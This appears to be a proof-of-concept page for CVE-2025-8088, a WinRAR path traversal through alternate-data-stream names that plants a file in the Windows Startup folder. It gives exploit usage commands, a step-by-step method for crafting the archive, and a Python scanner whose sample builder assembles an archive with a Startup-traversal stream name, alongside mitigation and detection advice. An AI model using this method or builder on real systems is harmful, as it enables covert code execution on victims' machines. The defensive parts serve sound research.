POC details: 3a7cd36136a52dd8dd244d8e8c2fdbf27a62f497

Source
Related vulnerability
Title: WinRAR security vulnerability (CVE-2025-8088)
Description: WinRAR is a file archiver from the WinRAR vendor; it compresses and extracts RAR, ZIP and other formats. WinRAR contains a security vulnerability caused by a path traversal problem that may lead to arbitrary code execution.
Introduction
# CVE-2025-8088 WinRAR Startup Folder Exploit Proof of Concept

![Windows](https://img.shields.io/badge/Platform-Windows-blue)
![Python](https://img.shields.io/badge/Python-3.7%2B-green)
![License](https://img.shields.io/badge/License-MIT-red)

A proof-of-concept exploit for **CVE-2025-8088**, a high-severity WinRAR path traversal: a `..\` sequence hidden in the name of an NTFS Alternate Data Stream (ADS) inside a RAR archive lets an attacker write a file outside the extraction directory, here into the Windows Startup folder.

---

## 📖 Overview

**CVE-2025-8088** is a path traversal vulnerability in WinRAR for Windows. A crafted RAR archive stores an NTFS alternate data stream whose name contains `..\` segments; vulnerable versions validated the file name but not the stream name, and appended the stream name to the extracted file's path, so extraction writes data to a location of the attacker's choosing. The bug was exploited in the wild as a zero-day before a fix shipped.  
This PoC targets the **Windows Startup folder** (`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup`), so the dropped payload runs automatically at the next logon.

---

## ⚠️ Disclaimer

> **This tool is for educational and research purposes only.**  
> Use only on systems you own or have explicit permission to test.  
> The authors are **not responsible** for any misuse of this tool.

---

## 🛡️ Affected Versions

- WinRAR for Windows **7.12 and earlier**, including the Windows builds of the RAR and UnRAR command-line tools and UnRAR.dll (the Unix and Android versions are not affected)
- ✅ Fixed in **WinRAR 7.13**; every later release contains the fix

---

## 📋 Prerequisites

- Windows on an **NTFS** volume (the PoC first attaches a real alternate data stream to the decoy file, which only NTFS supports)
- Python **3.7 or higher**
- WinRAR installed (`rar.exe` available in PATH or specified manually)

---

## 🚀 Installation

1. Clone this repository:

   ```bash
   git clone https://github.com/your-username/CVE-2025-8088-WinRAR-Startup-Exploit.git
   cd CVE-2025-8088-WinRAR-Startup-Exploit
   ```

## 🎯 Usage

Basic usage with default parameters:

```bash
python cve-2025-8088-poc.py --decoy document.txt --payload script.bat
```

Advanced usage with custom parameters:

```bash
python cve-2025-8088-poc.py \
  --decoy "Important Document.pdf" \
  --payload "payload.bat" \
  --rar "C:\Program Files\WinRAR\rar.exe" \
  --out "malicious_archive.rar" \
  --workdir "C:\temp\exploit" \
  --placeholder_len 150
```

### Parameters

| Parameter           | Description                               | Default                         |
| ------------------- | ----------------------------------------- | ------------------------------- |
| `--decoy`           | Path to decoy file (created if missing)   | Required                        |
| `--payload`         | Path to payload file (created if missing) | Required                        |
| `--rar`             | Path to rar.exe                           | Auto-detected                   |
| `--out`             | Output RAR filename                       | `cve-2025-8088-startup-poc.rar` |
| `--workdir`         | Working directory                         | Current directory               |
| `--placeholder_len` | Length of ADS placeholder                 | Auto-calculated                 |

---

## 🔧 How It Works

1. **File Preparation** – Creates the decoy and payload files if they don't exist
2. **ADS Attachment** – Writes the payload into an Alternate Data Stream of the decoy file, under a placeholder stream name
3. **Archive Creation** – Runs `rar.exe` to build a base archive containing the decoy together with its stream (RAR stores the stream as a separate `STM` service header that follows the file's own header)
4. **Archive Manipulation** – Patches the archive bytes, overwriting the placeholder stream name with a `..\`-traversal path into `AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup` (`--placeholder_len` controls how much room the placeholder reserves for that path)
5. **Execution** – A vulnerable WinRAR appends the stream name to the extracted decoy's path and opens `<extract dir>\<decoy>:..\..\...\Startup\<payload>`; Windows path normalisation collapses the `..` segments, so the payload lands in the **Startup folder** and runs at the next logon

The exploit relies on **WinRAR's handling of NTFS streams** and on **missing validation of the stream name**: the file name in the archive header is checked for traversal, but the stream name attached to it was not.

---

## 🧪 Example Payload

A default payload is created if none exists:

```batch
@echo off
echo Hello World from Startup!
pause
```

> ⚠️ In real-world scenarios, this could be replaced with malicious code.
> For testing, we use a **harmless script**.

---

## 🛡️ Mitigation

1. Update WinRAR to **7.13 or later**; the Windows RAR/UnRAR command-line tools and UnRAR.dll are affected too and must be updated where they are installed separately
2. Be cautious when extracting archives from **untrusted sources**, and extract into a throwaway directory rather than a profile folder
3. Regularly monitor the **Startup folders** (`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup` per user, `%ProgramData%\Microsoft\Windows\Start Menu\Programs\StartUp` for all users) for unexpected entries
4. Use security software capable of inspecting **archive headers**, not only the extracted files

---

## 📊 Detection

Security teams can look for:

* RAR archives that carry NTFS alternate data streams (`STM` service headers), particularly where the stream name contains `\`, `/` or `..` sequences, which no legitimate stream name needs
* Archives with unusually long file or stream names containing **path traversal sequences**
* Files written into a **Startup folder** by an archiver process (WinRAR.exe, rar.exe, unrar.exe), for example Sysmon file-create events (Event ID 11) whose image is an archiver and whose target path contains `\Start Menu\Programs\Startup\`
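
The header manipulation described under "How It Works" and the first two detection bullets above are easiest to see on real bytes. The scanner below is an added example, not code from this PoC or from WinRAR: it walks RAR5 block headers as laid out in the public RAR 5.0 format notes, verifies each header CRC32 (a mismatch means the archive was patched after creation without re-checksumming), flags `STM` service headers whose stream name contains a path separator, and also flags the classic `..` segment in an ordinary file name. The sample archives are constructed inside the block (`build_sample`, `make_entry` and `STARTUP_STREAM` are names chosen here; the stream-name shape is an assumption modelled on the technique, not bytes taken from the PoC's output).

```python
# Added example (not part of this PoC or of WinRAR): RAR5 header walker per the RAR 5.0 format notes.
import re
import struct
import zlib

RAR5_SIG = b"Rar!\x1a\x07\x01\x00"
HFL_EXTRA, HFL_DATA = 0x0001, 0x0002             # header flags: extra area / data area present
HEAD_MAIN, HEAD_FILE, HEAD_SERVICE, HEAD_ENDARC = 1, 2, 3, 5
FHFL_TIME, FHFL_CRC32 = 0x0002, 0x0004           # file flags: mtime / data CRC32 field present
FHEXTRA_SUBDATA = 0x07                           # extra record that holds an STM stream name
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
# Assumed shape of the stream name the PoC patches in: climb to the profile root, then Startup.
STARTUP_STREAM = ":" + "..\\" * 6 + "AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.bat"

def read_vint(buf, pos):
    """Decode a RAR5 vint: 7 bits per byte, least significant first, bit 7 = continue."""
    value, shift = 0, 0
    while True:
        b, pos = buf[pos], pos + 1
        value |= (b & 0x7F) << shift
        shift += 7
        if not b & 0x80:
            return value, pos

def parse_headers(data):
    """Yield (header_type, name, stream_name, crc_ok) for each block of a RAR5 archive."""
    if not data.startswith(RAR5_SIG):
        raise ValueError("not a RAR5 archive")
    pos = len(RAR5_SIG)
    while pos < len(data):
        stored_crc = struct.unpack_from("<I", data, pos)[0]
        size, p = read_vint(data, pos + 4)                  # header size counts from the type field
        hdr_end = p + size
        crc_ok = zlib.crc32(data[pos + 4:hdr_end]) == stored_crc   # CRC spans size field..extra area
        htype, p = read_vint(data, p)
        flags, p = read_vint(data, p)
        extra_size, p = read_vint(data, p) if flags & HFL_EXTRA else (0, p)
        data_size, p = read_vint(data, p) if flags & HFL_DATA else (0, p)
        name = stream = None
        if htype in (HEAD_FILE, HEAD_SERVICE):
            file_flags, p = read_vint(data, p)
            p = read_vint(data, read_vint(data, p)[1])[1]   # skip unpacked size and attributes
            p += 4 * bool(file_flags & FHFL_TIME) + 4 * bool(file_flags & FHFL_CRC32)
            p = read_vint(data, read_vint(data, p)[1])[1]   # skip compression info and host OS
            name_len, p = read_vint(data, p)
            name = data[p:p + name_len].decode("utf-8", "replace")
            q = hdr_end - extra_size                        # extra area is the tail of the header
            while q < hdr_end:
                rec_size, q = read_vint(data, q)            # size counts from the record type field
                rec_type, body_start = read_vint(data, q)
                if rec_type == FHEXTRA_SUBDATA:
                    stream = data[body_start:q + rec_size].decode("utf-8", "replace")
                q += rec_size
        yield htype, name, stream, crc_ok
        pos = hdr_end + data_size
        if htype == HEAD_ENDARC:
            break

def scan(data):
    """Return findings as strings; an empty list means nothing suspicious."""
    findings = []
    for htype, name, stream, crc_ok in parse_headers(data):
        if not crc_ok:
            findings.append(f"block type {htype}: header CRC mismatch (patched after creation?)")
        if htype == HEAD_SERVICE and name == "STM" and stream is not None:
            # A genuine stream name (":Zone.Identifier") never needs a path separator.
            if "\\" in stream or "/" in stream:
                findings.append(f"STM stream name with path separators (traversal): {stream!r}")
        elif name and TRAVERSAL.search(name):
            findings.append(f"file name with a '..' segment: {name!r}")
    return findings

# Constructed sample archives for exercising the scanner; assembled here, not produced by rar.exe.
def encode_vint(n):
    out = bytearray()
    while n > 0x7F:
        out.append(n & 0x7F | 0x80)
        n >>= 7
    return bytes(out + bytes([n]))

def make_block(htype, body, extra=b"", payload=b""):
    flags = (HFL_EXTRA if extra else 0) | (HFL_DATA if payload else 0)
    hdr = encode_vint(htype) + encode_vint(flags)
    hdr += (encode_vint(len(extra)) if extra else b"") + (encode_vint(len(payload)) if payload else b"")
    sized = encode_vint(len(hdr) + len(body) + len(extra)) + hdr + body + extra
    return struct.pack("<I", zlib.crc32(sized)) + sized + payload   # header CRC32 computed correctly

def make_entry(htype, name, payload, stream=None):   # file (2) or service (3) header, stored, Windows
    body = (encode_vint(FHFL_CRC32) + encode_vint(len(payload)) + encode_vint(0x20)
            + struct.pack("<I", zlib.crc32(payload)) + encode_vint(0) + encode_vint(0)
            + encode_vint(len(name.encode())) + name.encode())
    rec = encode_vint(FHEXTRA_SUBDATA) + stream.encode() if stream is not None else b""
    return make_block(htype, body, encode_vint(len(rec)) + rec if rec else b"", payload)

def build_sample(stream_name):
    """Decoy file followed by an STM service header whose stream name is stream_name."""
    return (RAR5_SIG + make_block(HEAD_MAIN, encode_vint(0))
            + make_entry(HEAD_FILE, "document.txt", b"decoy text")
            + make_entry(HEAD_SERVICE, "STM", b"@echo off\r\n", stream=stream_name)
            + make_block(HEAD_ENDARC, encode_vint(0)))
```

Feed `scan()` the raw bytes of a downloaded archive. A stream name containing a separator is the CVE-2025-8088 signature regardless of which folder it points at, and a header CRC mismatch on its own deserves a look because `rar.exe` never produces one. The walker reads only RAR5 (signature `Rar!\x1A\x07\x01\x00`); RAR4 archives and RAR5 archives with encrypted headers (block type 4) need a different path, since their names are not readable without the password.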

---

## 📚 References

* [CVE-2025-8088](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8088)
* [WinRAR Security Advisory](https://www.win-rar.com/singlenews.html?&L=0&tx_ttnews%5Btt_news%5D=174&cHash=abc123def456)
* [MITRE ATT\&CK: T1547.001 - Boot or Logon Autostart Execution](https://attack.mitre.org/techniques/T1547/001/)

---

## 🤝 Contributing

We welcome contributions to improve this PoC for educational purposes. Please ensure:

1. Your changes are **clearly documented**
2. You include **tests** where applicable
3. You follow **responsible disclosure practices**

---

## 📄 License

This project is licensed under the **MIT License** – see the [LICENSE](LICENSE) file for details.
File snapshot

```text
[4.0K] /data/pocs/3a7cd36136a52dd8dd244d8e8c2fdbf27a62f497
├── [9.1K] main.py
└── [4.9K] README.md

0 directories, 2 files
```